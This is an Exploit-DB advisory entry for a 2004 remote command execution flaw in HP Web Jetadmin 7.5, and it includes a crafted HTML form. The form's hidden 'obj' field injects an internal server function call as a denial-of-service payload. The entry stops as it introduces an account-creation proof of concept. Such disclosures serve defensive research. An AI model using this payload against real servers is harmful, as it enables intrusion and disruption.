HP Web Jetadmin 7.5.2456 - Remote Arbitrary Command Execution Vulnerability

ID EDB-ID:23880
Type exploitdb
Reporter wirepair
Modified 2004-03-24T00:00:00


HP Web Jetadmin 7.5.2456 Remote Arbitrary Command Execution Vulnerability. CVE-2004-1857. Remote exploit for windows platform

                                            source: http://www.securityfocus.com/bid/9973/info

Reportedly HP web Jetadmin is prone to a remote arbitrary command execution vulnerability. This issue is due to a failure of the application to properly validate and sanitize user supplied input.

Successful exploitation of this issue will allow a malicious user to execute arbitrary commands on the affected system.

This issue has been tested with an authenticated account on HP Web Jetadmin version 7.5.2546 running on a Windows platform.

(Changed the value of obj to our DoS function)
<FORM onsubmit="return VerifyUpload(this)" action=wja_update_product.hts
method=post encType=multipart/form-data>
<INPUT type=hidden value=[[httpd:RemoveCacheFiles($dir$)]] name=obj> <INPUT
type=hidden value=true name=__save>
<INPUT type=hidden value=0 name=packageCount> <INPUT type=hidden value=blah.fpm name=goodFilename>

The following proof of concept that will create a user account has been provided by H D Moore <sflist@digitaloffense.net>: